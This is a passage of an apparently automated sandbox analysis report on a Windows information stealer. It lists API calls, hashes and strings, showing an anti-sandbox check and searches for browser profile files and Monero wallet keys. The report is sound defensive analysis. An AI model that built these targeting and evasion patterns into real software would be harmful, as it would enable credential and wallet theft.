                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 803317263-2766056989
                  • Opcode ID: a7dd6992392f3180204e89abeb0abb50ab4389c12dbe6d24f11458f21520b714
                  • Instruction ID: f2127b2f03cee1c07d210fdaf77e47c3d59eb869007ac9acc238403e74875a9b
                  • Opcode Fuzzy Hash: a7dd6992392f3180204e89abeb0abb50ab4389c12dbe6d24f11458f21520b714
                  • Instruction Fuzzy Hash: F2014BB0954308FAEF10EBE8CC49B9EBB78FB14705F208148E709F62C5D7749941879A
                  APIs
                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0087112B
                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00871132
                  • ExitProcess.KERNEL32 ref: 00871143
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Process$AllocCurrentExitNumaVirtual
                  • String ID:
                  • API String ID: 1103761159-0
                  • Opcode ID: e90569f6889517c00f0735e35ab0e933a1904d9bd484107040bad44753a07e20
                  • Instruction ID: 6c422c0fc41b33f7fcb591f20b717a92a3729dc3b7ecafa5ac52d132f853d578
                  • Opcode Fuzzy Hash: e90569f6889517c00f0735e35ab0e933a1904d9bd484107040bad44753a07e20
                  • Instruction Fuzzy Hash: 78E08670945348FBEB10ABE4DC0EB0876B8FB04B01F104144F708BA5D1CAB56641969A
                  APIs
                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 008710B3
                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 008710F7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Virtual$AllocFree
                  • String ID:
                  • API String ID: 2087232378-0
                  • Opcode ID: e4a00118e95958faf8950d84ffbcbfb81cc34257376e9e5d7c34298a7b0ebe96
                  • Instruction ID: 22b5a2f223497531d13e89015cdb401711a8fe6458d9592cdcb66080907de169
                  • Opcode Fuzzy Hash: e4a00118e95958faf8950d84ffbcbfb81cc34257376e9e5d7c34298a7b0ebe96
                  • Instruction Fuzzy Hash: 11F0E271641308BBEB14DAA8AC4DFAAB7ECE705B15F304548F508E3290D5719E40CAA1
                  APIs
                    • Part of subcall function 008878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00887910
                    • Part of subcall function 008878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00887917
                    • Part of subcall function 008878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0088792F
                    • Part of subcall function 00887850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008711B7), ref: 00887880
                    • Part of subcall function 00887850: RtlAllocateHeap.NTDLL(00000000), ref: 00887887
                    • Part of subcall function 00887850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0088789F
                  • ExitProcess.KERNEL32 ref: 008711C6
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                  • String ID:
                  • API String ID: 3550813701-0
                  • Opcode ID: 1f2c7f51946155851da027c21168fad603b6e28e926516540751a3b944207960
                  • Instruction ID: 0f989523357c709e75e3e5124ba7a52c948fa87ee86c4ab3e5794321aef3924c
                  • Opcode Fuzzy Hash: 1f2c7f51946155851da027c21168fad603b6e28e926516540751a3b944207960
                  • Instruction Fuzzy Hash: 84E0ECA5914202A2CA14B7F9AC4AB2A329CFB24345F541524FA09D6553FE25E901877B
                  APIs
                  • wsprintfA.USER32 ref: 008838CC
                  • FindFirstFileA.KERNEL32(?,?), ref: 008838E3
                  • lstrcat.KERNEL32(?,?), ref: 00883935
                  • StrCmpCA.SHLWAPI(?,00890F70), ref: 00883947
                  • StrCmpCA.SHLWAPI(?,00890F74), ref: 0088395D
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00883C67
                  • FindClose.KERNEL32(000000FF), ref: 00883C7C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                  • API String ID: 1125553467-2524465048
                  • Opcode ID: 8e0aaf8d9ac51fbea54a26f599b5bbf2eef8a6c10e0c7e8e1f7233a3c9feb3e5
                  • Instruction ID: 19fd4858c61068afcbfc29ad3c8387cae4dcdd61a7e77cd3e304f6bce9d821dd
                  • Opcode Fuzzy Hash: 8e0aaf8d9ac51fbea54a26f599b5bbf2eef8a6c10e0c7e8e1f7233a3c9feb3e5
                  • Instruction Fuzzy Hash: 46A150B2A00218ABDB24EFA4DC85FEE7379FB54700F044688E50DD6191EB759B85CF62
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • FindFirstFileA.KERNEL32(00000000,?,00890B32,00890B2B,00000000,?,?,?,008913F4,00890B2A), ref: 0087BEF5
                  • StrCmpCA.SHLWAPI(?,008913F8), ref: 0087BF4D
                  • StrCmpCA.SHLWAPI(?,008913FC), ref: 0087BF63
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087C7BF
                  • FindClose.KERNEL32(000000FF), ref: 0087C7D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                  • API String ID: 3334442632-726946144
                  • Opcode ID: b359cd8fa5c5bd06414340498d6b3e8a9ff131c81bfc432be0bc0068e1337f0e
                  • Instruction ID: 24406ed0716e7a46240d73b92e6d50909f5c6c94d92a85a14dafbfec36c09285
                  • Opcode Fuzzy Hash: b359cd8fa5c5bd06414340498d6b3e8a9ff131c81bfc432be0bc0068e1337f0e
                  • Instruction Fuzzy Hash: 7F4253729101049BDB18FBA8DD96EED7339FB54300F408569F50AD61D1EE38AB49CBA3
                  APIs
                  • wsprintfA.USER32 ref: 0088492C
                  • FindFirstFileA.KERNEL32(?,?), ref: 00884943
                  • StrCmpCA.SHLWAPI(?,00890FDC), ref: 00884971
                  • StrCmpCA.SHLWAPI(?,00890FE0), ref: 00884987
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00884B7D
                  • FindClose.KERNEL32(000000FF), ref: 00884B92
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: fbc12c7e1e5c2d27f39d24c31b9fce4d1974cf86af668a7e2ae10082b99c1d50
                  • Instruction ID: e835f51a657bcaa06778653c4766ddb5e24d115cf307b686ad4a03af636787ae
                  • Opcode Fuzzy Hash: fbc12c7e1e5c2d27f39d24c31b9fce4d1974cf86af668a7e2ae10082b99c1d50
                  • Instruction Fuzzy Hash: 866135B2900219ABCB24FBE4DC45EEA777CFB58700F048688E509D6151EF75DB858F91
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00884580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00884587
                  • wsprintfA.USER32 ref: 008845A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 008845BD
                  • StrCmpCA.SHLWAPI(?,00890FC4), ref: 008845EB
                  • StrCmpCA.SHLWAPI(?,00890FC8), ref: 00884601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0088468B
                  • FindClose.KERNEL32(000000FF), ref: 008846A0
                  • lstrcat.KERNEL32(?,015DE410), ref: 008846C5
                  • lstrcat.KERNEL32(?,015DD2B8), ref: 008846D8
                  • lstrlen.KERNEL32(?), ref: 008846E5
                  • lstrlen.KERNEL32(?), ref: 008846F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                  • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: 2dfa6348e738e6452271861b96514fb84955896b6ce982650e07c53f9196e6ac
                  • Instruction ID: b9c4c8ae4616bb54d86d6bc7db62e771e08d9f046f068cf154053ca05be28b57
                  • Opcode Fuzzy Hash: 2dfa6348e738e6452271861b96514fb84955896b6ce982650e07c53f9196e6ac
                  • Instruction Fuzzy Hash: D45144B2540218ABCB24FBB4DC89FE9777CFB64700F404688B609D2191EF749B858F92
                  APIs
                  • wsprintfA.USER32 ref: 00883EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00883EDA
                  • StrCmpCA.SHLWAPI(?,00890FAC), ref: 00883F08
                  • StrCmpCA.SHLWAPI(?,00890FB0), ref: 00883F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0088406C
                  • FindClose.KERNEL32(000000FF), ref: 00884081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                   • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 45da03d31fbd9c9692d18a2f7d6a4d5c016c127d329cd588e80879639926164c
                  • Instruction ID: ec3cf2189ea9cd98ab34e6b59b6fb9199988b315b7af033067827c594654df65
                  • Opcode Fuzzy Hash: 45da03d31fbd9c9692d18a2f7d6a4d5c016c127d329cd588e80879639926164c
                  • Instruction Fuzzy Hash: ED5148B2900218ABCB24FBF4DC45EEA737CFB54700F444688B659D6091EB75DB868F51
                  APIs
                  • wsprintfA.USER32 ref: 0087ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 0087ED55
                  • StrCmpCA.SHLWAPI(?,00891538), ref: 0087EDAB
                  • StrCmpCA.SHLWAPI(?,0089153C), ref: 0087EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087F2AE
                  • FindClose.KERNEL32(000000FF), ref: 0087F2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                   • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: ea53eaecf22c8c28254f46b9da29bba57d86f5f9bfe68fef40e2eafc4a6a5c59
                  • Instruction ID: dd321644e495dd6ab137ed21b8a9d58d6e4b11b0081d53736884135c0d7dad6a
                  • Opcode Fuzzy Hash: ea53eaecf22c8c28254f46b9da29bba57d86f5f9bfe68fef40e2eafc4a6a5c59
                  • Instruction Fuzzy Hash: 69E1B1719111185AEB58FB64DD95AEE7338FF54300F4041EAB51AE20D2EE346B8ACF63
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                    • Part of subcall function 0088A920: lstrcpy.KERNEL32(00000000,?), ref: 0088A972
                    • Part of subcall function 0088A920: lstrcat.KERNEL32(00000000), ref: 0088A982
                    • Part of subcall function 0088A9B0: lstrlen.KERNEL32(?,015D8A80,?,\Monero\wallet.keys,00890E17), ref: 0088A9C5
                    • Part of subcall function 0088A9B0: lstrcpy.KERNEL32(00000000), ref: 0088AA04
                    • Part of subcall function 0088A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0088AA12
                    • Part of subcall function 0088A8A0: lstrcpy.KERNEL32(?,00890E17), ref: 0088A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,008915B8,00890D96), ref: 0087F71E
                  • StrCmpCA.SHLWAPI(?,008915BC), ref: 0087F76F
                  • StrCmpCA.SHLWAPI(?,008915C0), ref: 0087F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0087FAB1
                  • FindClose.KERNEL32(000000FF), ref: 0087FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2114086496.0000000000871000.00000040.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                   • Associated: 00000000.00000002.2114059055.0000000000870000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000921000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.000000000092D000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000952000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2114086496.0000000000ABA000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000ACE000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D30000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D55000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117076641.0000000000D6C000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117296447.0000000000D6D000.00000080.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117394847.0000000000F09000.00000040.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.2117405958.0000000000F0A000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_870000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 7cd0643749f5d16cf723104ba793dc6e91712d5b360109d5880ed4c422021fd7
                  • Instruction ID: 956096dda8c7f4d9473cc1960175862da185e7a080e1631ff83b7076cebc67da
                  • Opcode Fuzzy Hash: 7cd0643749f5d16cf723104ba793dc6e91712d5b360109d5880ed4c422021fd7
                  • Instruction Fuzzy Hash: 27B153719001189BDB28FF68DC95AED7379FF54300F4081A9E50AD6196EF34AB49CBA3
                  APIs
                    • Part of subcall function 0088A740: lstrcpy.KERNEL32(00890E17,00000000), ref: 0088A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0089510C,?,?,?,008951B4,?,?,00000000,?,00000000), ref: 00871923
                  • StrCmpCA.SHLWAPI(?,0089525C), ref: 00871973
